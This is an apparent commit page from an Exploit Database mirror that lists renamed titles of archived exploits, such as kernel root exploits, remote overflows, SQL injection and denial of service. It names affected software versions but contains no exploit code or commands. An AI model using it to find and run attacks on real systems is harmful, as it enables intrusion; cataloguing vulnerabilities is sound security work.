DB: 2016-05-11 · dongfengyz/exploit-database@52e862d

Commit

DB: 2016-05-11

9 new exploits

Linux Kernel 2.2.x - 2.4.x - ptrace/kmod Local Root Exploit
Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit

Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
Sendmail <= 8.12.8 - prescan() BSD Remote Root Exploit

Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit
Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit

mIRC 6.1 - _IRC_ Protocol Remote Buffer Overflow Exploit
mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit

Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit

Linux Kernel 2.4.22 - _do_brk()_ Local Root Exploit (PoC)
Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept)

Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working)
Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit
Xsok 1.02 - _-xsokdir_ Local Buffer Overflow Game Exploit
Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - _do_mremap_ Local Proof of Concept (2)
Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2)

Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit

Serv-U FTPD 3.x/4.x _SITE CHMOD_ Command Remote Exploit
Serv-U FTPD 3.x/4.x-  'SITE CHMOD' Command Remote Exploit

Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Local Proof-of-Concept (2)
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - _mremap()_ Missing _do_munmap_ Exploit
Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit
Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit

eMule <= 0.42d IRC Remote Buffer Overflow Exploit
eMule <= 0.42d - IRC Remote Buffer Overflow Exploit

GnomeHack Local Buffer Overflow Exploit (gid=games)
GnomeHack - Local Buffer Overflow Exploit (gid=games)

Kwintv Local Buffer Overflow Exploit (gid=video(33))
Kwintv - Local Buffer Overflow Exploit (gid=video(33))

Redhat 6.1 man Local Exploit (egid 15)
Redhat 6.1 man - Local Exploit (egid 15)

Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit
Linux Kernel <= 2.6.3 - 'setsockopt' Local Denial of Service Exploit
Linux Kernel 2.4.x - 2.6.x - Assembler Inline Function Local DoS Exploit
rlpr <= 2.04 msg() Remote Format String Exploit
MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit
Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local DoS Exploit
rlpr <= 2.04 - msg() Remote Format String Exploit
MPlayer <= 1.0pre4 GUI - filename handling Overflow Exploit

Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit
Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit

OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit
OpenFTPD <= 0.30.1 - (message system) Remote Shell Exploit

Linux Kernel - File Offset Pointer Handling Memory Disclosure Exploit
Linux Kernel <= 2.4.26- File Offset Pointer Handling Memory Disclosure Exploit

Ollydbg <= 1.10 Format String Bug
Ollydbg <= 1.10 - Format String Bug
Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit
Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit
LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit
Mac OS X <= 10.3.3 - AppleFileServer Remote Root Overflow Exploit
Remote CVS <= 1.11.15 - (error_prog_name) Remote Exploit
LibPNG <= 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit

AOL Instant Messenger AIM _Away_ Message Local Exploit
AOL Instant Messenger AIM - 'Away' Message Local Exploit

Ground Control <= 1.0.0.7 (Server/Client) Denial of Service Exploit
Ground Control <= 1.0.0.7 - (Server/Client) Denial of Service Exploit

AOL Instant Messenger AIM _Away_ Message Remote Exploit
AOL Instant Messenger AIM - 'Away' Message Remote Exploit (2)

Silent Storm Portal Multiple Vulnerabilities
Silent Storm Portal - Multiple Vulnerabilities

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit
YahooPOPs <= 1.6 - SMTP Port Buffer Overflow Exploit

Monit <= 4.2 Basic Authentication Remote Root Exploit
Monit <= 4.2 - Basic Authentication Remote Root Exploit

YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit
YahooPOPs <= 1.6 - SMTP Remote Buffer Overflow Exploit

Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit
Ability Server <= 2.34 - (APPE) Remote Buffer Overflow Exploit
Chatman <= 1.5.1 RC1 Broadcast Crash Exploit
Flash Messaging <= 5.2.0g Remote Denial of Service Exploit
Chatman <= 1.5.1 RC1 - Broadcast Crash Exploit
Flash Messaging <= 5.2.0g - Remote Denial of Service Exploit
CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) BoF Exploit
Halo <= 1.05 Broadcast Client Crash Exploit
CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) - BoF Exploit
Halo <= 1.05 - Broadcast Client Crash Exploit

Soldier of Fortune II <= 1.3 Server/Client Denial of Service Exploit
Soldier of Fortune II <= 1.3 Server/Client - Denial of Service Exploit

Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit
Star Wars Battlefront <= 1.1 - Fake Players Denial of Service Exploit

PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit
PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit

WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit
WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit

Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit
Jana Server <= 2.4.4 - (http/pna) Denial of Service Exploit

Kreed <= 1.05 Format String and Denial of Service Exploit
Kreed <= 1.05 - Format String and Denial of Service Exploit

Codename Eagle <= 1.42 Socket Unreacheable DoS Exploit
Codename Eagle <= 1.42 - Socket Unreacheable DoS Exploit

Linux Kernel <= 2.6.9 / 2.4.22-28 - (igmp.c) Local Denial of Service Exploit
Linux Kernel <= 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit
WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC
Cscope <= 15.5 Symlink Vulnerability Exploit
WinRAR <= 3.4.1 - Corrupt ZIP File Vulnerability PoC
Cscope <= 15.5 - Symlink Vulnerability Exploit

Linux Kernel 2.6.x - chown() Group Ownership Alteration Exploit
Linux Kernel 2.6.x (Slackware 9.1/ Debian 3.0) - chown() Group Ownership Alteration Exploit
Netcat 1.1 - _-e_ Switch Remote Buffer Overflow Exploit
PHP <= 4.3.7 openlog() Buffer Overflow Exploit
Netcat 1.1 - '-e' Switch Remote Buffer Overflow Exploit
PHP <= 4.3.7 - openlog() Buffer Overflow Exploit

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
phpBB <= 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)

Gore <= 1.50 Socket Unreacheable Denial of Service Exploit
Gore <= 1.50 - Socket Unreacheable Denial of Service Exploit

Exim <= 4.41 dns_build_reverse Local Exploit PoC
Exim <= 4.41 - dns_build_reverse Local Exploit PoC

Peer2Mail <= 1.4 Encrypted Password Dumper Exploit
Peer2Mail <= 1.4 - Encrypted Password Dumper Exploit

Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS
Mac OS X <= 10.3.7 - Input Validation Flaw parse_machfile() DoS

Xpand Rally <= 1.0.0.0 (Server/Clients) Crash Exploit
Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit

Painkiller <= 1.35 in-game cd-key alpha-numeric Buffer Overflow Exploit
Painkiller <= 1.35 - in-game cd-key alpha-numeric Buffer Overflow Exploit

Armagetron Advanced <= 0.2.7.0 Server Crash Exploit
Armagetron Advanced <= 0.2.7.0 - Server Crash Exploit

MercuryBoard <= 1.1.1 Working SQL Injection
MercuryBoard <= 1.1.1 - SQL Injection

GNU a2ps _Anything to PostScript_ Local Exploit (not suid)
GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)

vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution
vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (1)
vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution (part 2)
Serv-U 4.x _site chmod_ Remote Buffer Overflow Exploit
vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)
Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit

3Com 3CDaemon FTP Unauthorized _USER_ Remote BoF Exploit
3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit

vBulletin <= 3.0.6 php Code Injection
vBulletin <= 3.0.6 - PHP Code Injection

Soldier of Fortune 2 <= 1.03 - _cl_guid_ - Server Crash
Soldier of Fortune 2 <= 1.03 - 'cl_guid' - Server Crash

Knet <= 1.04c Buffer Overflow Denial of Service Exploit
Knet <= 1.04c - Buffer Overflow Denial of Service Exploit

Scrapland <= 1.0 Server Termination Denial of Service Exploit
Scrapland <= 1.0 - Server Termination Denial of Service Exploit
Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (update)
Apache <= 2.0.52 - HTTP GET request Denial of Service Exploit
Nokia Symbian 60 (Bluetooth Nickname) Remote Restart (2)

Microsoft Internet Explorer _mshtml.dll_ CSS Parsing Buffer Overflow
Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow

Ethereal <= 0.10.9 - _3G-A11_ - Remote Buffer Overflow Exploit (2)
Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows)

Ethereal <= 0.10.9 - _3G-A11_ Remote Buffer Overflow Exploit
Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Linux)

PHP-Nuke 6.x - 7.6 Top module Remote SQL Injection Exploit (working)
PHP-Nuke 6.x - 7.6 Top module - Remote SQL Injection Exploit

HP-UX FTPD <= 1.1.214.4 - _REST_ Remote Brute Force Exploit
HP-UX FTPD <= 1.1.214.4 - 'REST' Remote Brute Force Exploit
Invision Power Board <= 2.0.3 Login.PHP SQL Injection Exploit
Invision Power Board <= 2.0.3 Login.PHP SQL Injection (tutorial)
Invision Power Board <= 2.0.3 - Login.PHP SQL Injection Exploit
Invision Power Board <= 2.0.3 - Login.PHP SQL Injection (tutorial)
phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl)
phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php)
phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php 2)
phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (Perl)
phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)
phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)
Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit
MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit
Ethereal <= 0.10.10 - (SIP) Protocol Dissector Remote BoF Exploit
MyBulletinBoard (MyBB) <= 1.00 RC4 - SQL Injection Exploit

Microsoft Internet Explorer - javascript _window()_ Crash
Microsoft Internet Explorer - javascript 'window()' Crash

Kaspersky AntiVirus - _klif.sys_ Privilege Escalation Vulnerability
Kaspersky AntiVirus - 'klif.sys' Privilege Escalation Vulnerability

Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working)
Invision Power Board <= 1.3.1 - Login.PHP SQL Injection

WordPress <= 1.5.1.1 - _add new admin_ SQL Injection Exploit
WordPress <= 1.5.1.1 - 'add new admin' SQL Injection Exploit

Mozilla Firefox <= 1.0.4 - _Set As Wallpaper_ Code Execution Exploit
Mozilla Firefox <= 1.0.4 - 'Set As Wallpaper' Code Execution Exploit

Scorched 3D <= 39.1 - Multiple Vulnerabilities (All-in-One) (PoC)
Scorched 3D <= 39.1 - Multiple Vulnerabilities (PoC)

XOOPS (wfdownloads) 2.05 Module Multiple Vulnerabilities Exploit
XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities

Linux Kernel <= 2.6.11 - 'k-rad3.c' (CPL 0) Local Root Exploit
Linux Kernel <= 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit

Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities Exploit
Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities

nodez <= 4.6.1.1 mercury Multiple Vulnerabilities
nodez <= 4.6.1.1 mercury - Multiple Vulnerabilities

gCards <= 1.45 - Multiple Vulnerabilities All-In-One Exploit
gCards <= 1.45 - Multiple Vulnerabilities

Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit
Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit

OpenTTD <= 0.4.7 - (multiple vulnerabilities) Denial of Service Exploit
OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit

Apple Mac OS X Safari <= 2.0.3 (417.9.2) Multiple Vulnerabilities PoC
Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)

PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Exploit
PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities

outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities Exploit
outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities

raydium <= svn 309 - Multiple Vulnerabilities Exploit
raydium <= svn 309 - Multiple Vulnerabilities

PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS
PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow DoS

Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit
Ultimate PHP Board <= 1.96 GOLD - Multiple Vulnerabilities

Light Blog Remote Multiple Vulnerabilities Exploit
Light Blog Remote - Multiple Vulnerabilities

Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC
Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept

contentnow 1.30 (local/upload/delete) Multiple Vulnerabilities
contentnow 1.30 - (local/upload/delete) Multiple Vulnerabilities

contentnow 1.30 (upload/XSS) Multiple Vulnerabilities
contentnow 1.30 - (Upload/XSS) Multiple Vulnerabilities

torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities
torrentflux <= 2.2 - (create/exec/delete) Multiple Vulnerabilities
Messagerie Locale (centre.php) Remote File Inclusion Vulnerability
Site News (centre.php) Remote File Inclusion Vulnerability
Messagerie Locale (centre.php) - Remote File Inclusion Vulnerability
Site News (centre.php) - Remote File Inclusion Vulnerability

kubix <= 0.7 - Multiple Vulnerabilities Exploit
kubix <= 0.7 - Multiple Vulnerabilities

BBS E-Market Professional (Path Disclosure/Include) Multiple Vulnerabilities
BBS E-Market Professional - (Path Disclosure/Include) Multiple Vulnerabilities

F-Prot Antivirus 4.6.6 (ACE) Denial of Service Exploit
F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit

open newsletter <= 2.5 - Multiple Vulnerabilities Exploit (update)
open newsletter <= 2.5 - Multiple Vulnerabilities (2)

eNdonesia 8.4 (mod.php/friend.php/admin.php) Multiple Vulnerabilities
eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities

php-update <= 2.7 - Multiple Vulnerabilities Exploit
php-update <= 2.7 - Multiple Vulnerabilities

ig shop 1.0 (eval/SQL Injection) Multiple Vulnerabilities
ig shop 1.0 - (eval/SQL Injection) Multiple Vulnerabilities

QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities
QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities

vp-asp shopping cart 6.09 (SQL/XSS) Multiple Vulnerabilities
vp-asp shopping cart 6.09 - (SQL/XSS) Multiple Vulnerabilities

Aztek Forum 4.0 - Multiple Vulnerabilities Exploit
Aztek Forum 4.0 - Multiple Vulnerabilities

otscms <= 2.1.5 (SQL/XSS) Multiple Vulnerabilities
otscms <= 2.1.5 - (SQL/XSS) Multiple Vulnerabilities

uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit
uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow Exploit

Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities

qdblog 0.4 (SQL Injection/LFI) Multiple Vulnerabilities
qdblog 0.4 - (SQL Injection/LFI) Multiple Vulnerabilities

Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability
Censura 1.15.04 - (censura.php vendorid) SQL Injection Vulnerability

runawaysoft haber portal 1.0 (tr) Multiple Vulnerabilities
runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities

netclassifieds (SQL/XSS/full path) Multiple Vulnerabilities
netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities

bugmall shopping cart 2.5 (SQL/XSS) Multiple Vulnerabilities
bugmall shopping cart 2.5 - (SQL/XSS) Multiple Vulnerabilities

Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC
Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak Proof of Concept

Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility
Pictures Rating - (index.php msgid) Remote SQL Injection Vulnerbility

Joomla Component Nice Talk <= 0.9.3 (tagid) SQL Injection Vulnerability
Joomla Component Nice Talk <= 0.9.3 - (tagid) SQL Injection Vulnerability

Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0day)

Linux Kernel 2.4/2.6 - x86-64 System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 x86-64 - System Call Emulation Exploit

else if CMS 0.6 - Multiple Vulnerabilities / Exploit
else if CMS 0.6 - Multiple Vulnerabilities

Php-Stats 0.1.9.2 - Multiple Vulnerabilities Exploit
Php-Stats 0.1.9.2 - Multiple Vulnerabilities

Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC
Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow Proof of Concept

WorkingOnWeb 2.0.1400 events.php Remote SQL Injection Vulnerability
WorkingOnWeb 2.0.1400 - events.php Remote SQL Injection Vulnerability

Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service PoC
Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept

portalapp 4.0 (SQL/XSS/auth bypasses) Multiple Vulnerabilities
portalapp 4.0 - (SQL/XSS/auth bypasses) Multiple Vulnerabilities

evilboard 0.1a (SQL/XSS) Multiple Vulnerabilities
evilboard 0.1a - (SQL/XSS) Multiple Vulnerabilities

Evilsentinel <= 1.0.9 (multiple vulnerabilities) Disable Exploit
Evilsentinel <= 1.0.9 - (Multiple Vulnerabilities) Disable Exploit

blogcms 4.2.1b (SQL/XSS) Multiple Vulnerabilities
blogcms 4.2.1b - (SQL/XSS) Multiple Vulnerabilities

bloofox 0.3 (SQL/fd) Multiple Vulnerabilities
bloofox 0.3 - (SQL/fd) Multiple Vulnerabilities

Liquid-Silver CMS 0.1 (update) Local File Inclusion Vulnerability
Liquid-Silver CMS 0.1 - (update) Local File Inclusion Vulnerability

simple forum 3.2 (fd/XSS) Multiple Vulnerabilities
simple forum 3.2 - (fd/XSS) Multiple Vulnerabilities

Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability
Mambo Component Sermon 0.2 - (gid) SQL Injection Vulnerability

Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities
Philips VOIP841 - (Firmware <= 1.0.4.800) Multiple Vulnerabilities

pigyard art gallery Multiple Vulnerabilities
pigyard art gallery - Multiple Vulnerabilities
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability
XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability
XOOPS Module Gallery 0.2.2 - (gid) Remote SQL Injection Vulnerability
XOOPS Module My_eGallery 3.04 - (gid) SQL Injection Vulnerability
easycalendar <= 4.0tr Multiple Vulnerabilities
easygallery <= 5.0tr Multiple Vulnerabilities
easycalendar <= 4.0tr - Multiple Vulnerabilities
easygallery <= 5.0tr - Multiple Vulnerabilities

Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit
Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities

RedDot CMS 7.5 (LngId) Remote SQL Injection Exploit
RedDot CMS 7.5 - (LngId) Remote SQL Injection Exploit

minibb 2.2 (css/SQL/fpd) Multiple Vulnerabilities
minibb 2.2 - (css/SQL/fpd) Multiple Vulnerabilities

siteman 2.x (exec/LFI/XSS) Multiple Vulnerabilities
siteman 2.x - (exec/LFI/XSS) Multiple Vulnerabilities

megabbs forum 2.2 (SQL/XSS) Multiple Vulnerabilities
megabbs forum 2.2 - (SQL/XSS) Multiple Vulnerabilities

Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection Exploit
Joomla Component paxxgallery 0.2 - (gid) Blind SQL Injection Exploit

cplinks 1.03 (bypass/SQL/xxs) Multiple Vulnerabilities
cplinks 1.03 - (bypass/SQL/xxs) Multiple Vulnerabilities

deluxebb <= 1.2 - Multiple Vulnerabilities Exploit
deluxebb <= 1.2 - Multiple Vulnerabilities

Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities
Phoenix View CMS <= Pre Alpha2 - (SQL/LFI/XSS) Multiple Vulnerabilities

Ktools PhotoStore <= 3.5.1 (gallery.php gid) SQL Injection Vulnerability
Ktools PhotoStore <= 3.5.1 - (gallery.php gid) SQL Injection Vulnerability

idautomation bar code ActiveX Multiple Vulnerabilities
idautomation bar code ActiveX - Multiple Vulnerabilities
ecms 0.4.2 (SQL/pb) Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 (CE/XSS/CSRF) Multiple Vulnerabilities
ecms 0.4.2 - (SQL/pb) Multiple Vulnerabilities
Mantis Bug Tracker 1.1.1 - (CE/XSS/CSRF) Multiple Vulnerabilities

mebiblio 0.4.7 (SQL/upload/XSS) Multiple Vulnerabilities
mebiblio 0.4.7 - (SQL/upload/XSS) Multiple Vulnerabilities

smeweb 1.4b (SQL/XSS) Multiple Vulnerabilities
smeweb 1.4b - (SQL/XSS) Multiple Vulnerabilities

PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities
PHP-Address Book <= 3.1.5 - (SQL/XSS) Multiple Vulnerabilities

427bb 2.3.1 (SQL/XSS) Multiple Vulnerabilities
427bb 2.3.1 - (SQL/XSS) Multiple Vulnerabilities

Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulnerabilities
Black Ice Software Inc Barcode SDK - (BIDIB.ocx) Multiple Vulnerabilities
real estate Web site 1.0 (SQL/XSS) Multiple Vulnerabilities
telephone directory 2008 (SQL/XSS) Multiple Vulnerabilities
real estate Web site 1.0 - (SQL/XSS) Multiple Vulnerabilities
telephone directory 2008 - (SQL/XSS) Multiple Vulnerabilities

gravity board x 2.0 beta (SQL/XSS) Multiple Vulnerabilities
gravity board x 2.0 beta - (SQL/XSS) Multiple Vulnerabilities

butterfly organizer 2.0.0 (SQL/XSS) Multiple Vulnerabilities
butterfly organizer 2.0.0 - (SQL/XSS) Multiple Vulnerabilities

doITlive CMS <= 2.50 (SQL Injection/XSS) Multiple Vulnerabilities
doITlive CMS <= 2.50 - (SQL Injection/XSS) Multiple Vulnerabilities

ownrs blog beta3 (SQL/XSS) Multiple Vulnerabilities
ownrs blog beta3 - (SQL/XSS) Multiple Vulnerabilities

sitexs CMS 0.1.1 (upload/XSS) Multiple Vulnerabilities
sitexs CMS 0.1.1 - (upload/XSS) Multiple Vulnerabilities

shibby shop <= 2.2 (SQL/update) Multiple Vulnerabilities
shibby shop <= 2.2 - (SQL/update) Multiple Vulnerabilities

polypager <= 1.0rc2 (SQL/XSS) Multiple Vulnerabilities
polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities
otmanager CMS 24a (LFI/XSS) Multiple Vulnerabilities
w1l3d4 philboard 1.2 (blind sql/XSS) Multiple Vulnerabilities
otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities
w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities

Thelia 1.3.5 - Multiple Vulnerabilities Exploit
Thelia 1.3.5 - Multiple Vulnerabilities

contentnow 1.4.1 (upload/XSS) Multiple Vulnerabilities
contentnow 1.4.1 - (upload/XSS) Multiple Vulnerabilities

trixbox (langChoice) - Local File Inclusion Exploit (connect-back) (2)
trixbox - (langChoice) Local File Inclusion Exploit (connect-back) (2)

Trixbox 2.6.1 - (langChoice) Remote Root Exploit (py)
Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)

jsite 1.0 oe (SQL/LFI) Multiple Vulnerabilities
jsite 1.0 oe - (SQL/LFI) Multiple Vulnerabilities

Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit
Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit
e-vision CMS <= 2.02 (SQL/upload/ig) Multiple Vulnerabilities
k-links directory (SQL/XSS) Multiple Vulnerabilities
e-vision CMS <= 2.02 - (SQL/upload/ig) Multiple Vulnerabilities
k-links directory - (SQL/XSS) Multiple Vulnerabilities

Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities
Ppim <= 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities

Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
Ppim <= 1.0 - (upload/change password) Multiple Vulnerabilities

k-rate (SQL/XSS) Multiple Vulnerabilities
k-rate - (SQL/XSS) Multiple Vulnerabilities

Invision Power Board <= 2.3.5 - Multiple Vulnerabilities Exploit (revised)
Invision Power Board <= 2.3.5 - Multiple Vulnerabilities (2)

brim 2.0.0 (SQL/XSS) Multiple Vulnerabilities
brim 2.0.0 - (SQL/XSS) Multiple Vulnerabilities

aspwebalbum 3.2 (upload/SQL/XSS) Multiple Vulnerabilities
aspwebalbum 3.2 - (upload/SQL/XSS) Multiple Vulnerabilities

qwicsite pro (SQL/XSS) Multiple Vulnerabilities
qwicsite pro - (SQL/XSS) Multiple Vulnerabilities

Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
Hot Links SQL-PHP 3 - (report.php) Multiple Vulnerabilities

Availscript Article Script (articles.php) Multiple Vulnerabilities
Availscript Article Script - (articles.php) Multiple Vulnerabilities

Availscript Photo Album (pics.php) Multiple Vulnerabilities
Availscript Photo Album - (pics.php) Multiple Vulnerabilities

phpvid 1.1 0- (XSS/SQL) Multiple Vulnerabilities
phpvid 1.1 0 - (XSS/SQL) Multiple Vulnerabilities

php infoboard 7 - plus Multiple Vulnerabilities
php infoboard 7 plus - Multiple Vulnerabilities

camera life 2.6.2b4 (SQL/XSS) Multiple Vulnerabilities
camera life 2.6.2b4 - (SQL/XSS) Multiple Vulnerabilities

mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities
mini-pub 0.3 - (LFD/CE) Multiple Vulnerabilities

Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities Exploit
Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities

mystats (hits.php) Multiple Vulnerabilities Exploit
mystats - (hits.php) Multiple Vulnerabilities

Vivvo CMS <= 3.4 - Multiple Vulnerabilities Destroyer Exploit
Vivvo CMS <= 3.4 - Multiple Vulnerabilities

websvn <= 2.0 - (XSS/fh/ce) Multiple Vulnerabilities
websvn <= 2.0 - (XSS/fh/CE) Multiple Vulnerabilities

db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities
db Software Laboratory VImpX - (VImpX.ocx) Multiple Vulnerabilities

phpdaily (SQL/XSS/lfd) Multiple Vulnerabilities
phpdaily - (SQL/XSS/lfd) Multiple Vulnerabilities

questcms - (XSS/directory traversal/SQL) Multiple Vulnerabilities
questcms - (XSS/Directory Traversal/SQL) Multiple Vulnerabilities

apartment search script (rfu/XSS) Multiple Vulnerabilities
apartment search script - (RFU/XSS) Multiple Vulnerabilities

MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities
MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities

WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities
WEBBDOMAIN WebShop 1.02 - (SQL/XSS) Multiple Vulnerabilities

pre multi-vendor shopping malls Multiple Vulnerabilities
pre multi-vendor shopping malls - Multiple Vulnerabilities

Pre ADS Portal <= 2.0 (Auth Bypass/XSS) Multiple Vulnerabilities
Pre ADS Portal <= 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities

